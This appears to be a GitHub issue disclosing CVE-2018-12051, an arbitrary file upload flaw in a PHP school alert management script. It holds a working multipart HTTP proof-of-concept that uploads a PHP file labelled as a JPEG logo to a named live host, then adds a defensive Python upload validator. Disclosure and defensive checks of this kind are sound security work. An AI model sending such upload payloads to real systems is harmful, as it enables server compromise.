unh3x / just4cve


[CVE-2018-12051] Schools Alert Management Script - Arbitrary File Upload #5

Open unh3x opened 6 years ago

unh3x commented 6 years ago

================= Schools Alert Management Script - Arbitrary File Upload

Date: 07.06.2018
Vendor Homepage: https://www.phpscriptsmall.com/
Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
Category: Web Application
Exploit Author: M3@pandas From DBAppSecurity
Tested on: Linux Mint
CVE: CVE-2018-12051

================= Vulnerable cgi:

webmasterst/general.php

================= Proof of Concept:

POST /schoolalert/webmasterst/general.php HTTP/1.1
Host: www.schoolcollageerp.com
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------212590549826078610017859173
Content-Length: 369

-----------------------------212590549826078610017859173
Content-Disposition: form-data; name="sch_logo"; filename="x1.php"
Content-Type: image/jpeg

<?php phpinfo();@unlink(__FILE__);?>
-----------------------------212590549826078610017859173
Content-Disposition: form-data; name="submit.x"

1
-----------------------------212590549826078610017859173--


Shell is shown in response data, just enjoy it.

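The request above is accepted although the client-declared `Content-Type: image/jpeg` matches neither the `x1.php` filename nor the file content. The following server-side check is an added example, not code from the original report or from the vendor; the allowlist, the function names and the sample body (constructed to mirror the request in the post) are assumptions.

```python
import os
from email.parser import BytesParser

# Assumed policy for a logo field: image extensions and matching file signatures only.
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}

def check_upload(filename, declared_type, data):
    """Return reasons to reject one uploaded file; an empty list means accept."""
    reasons = []
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        reasons.append(f"extension {ext or '(none)'} not allowed")
    signatures = MAGIC.get(declared_type)
    if signatures is None:
        reasons.append(f"declared type {declared_type} not allowed")
    elif not data.startswith(signatures):
        reasons.append(f"content is not {declared_type}")
    return reasons

def inspect_request(content_type_header, body):
    """Parse a multipart/form-data body; map each file field to its reject reasons."""
    raw = b"Content-Type: " + content_type_header.encode("ascii") + b"\r\n\r\n" + body
    findings = {}
    for part in BytesParser().parsebytes(raw).walk():
        filename = part.get_filename()
        if filename is None:  # ordinary form field (or the multipart container)
            continue
        field = part.get_param("name", header="content-disposition")
        data = part.get_payload(decode=True) or b""
        findings[field] = check_upload(filename, part.get_content_type(), data)
    return findings

# Constructed sample mirroring the request in the post (boundary shortened).
BOUNDARY = "----constructed-boundary"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="sch_logo"; filename="x1.php"\r\n'
    "Content-Type: image/jpeg\r\n\r\n<?php phpinfo(); ?>\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="submit.x"\r\n\r\n'
    f"1\r\n--{BOUNDARY}--\r\n"
).encode("ascii")

if __name__ == "__main__":
    print(inspect_request("multipart/form-data; boundary=" + BOUNDARY, SAMPLE_BODY))
```

Validation of this kind is one layer; storing accepted files under a server-generated name in a directory where the web server does not execute scripts covers the cases a signature check misses.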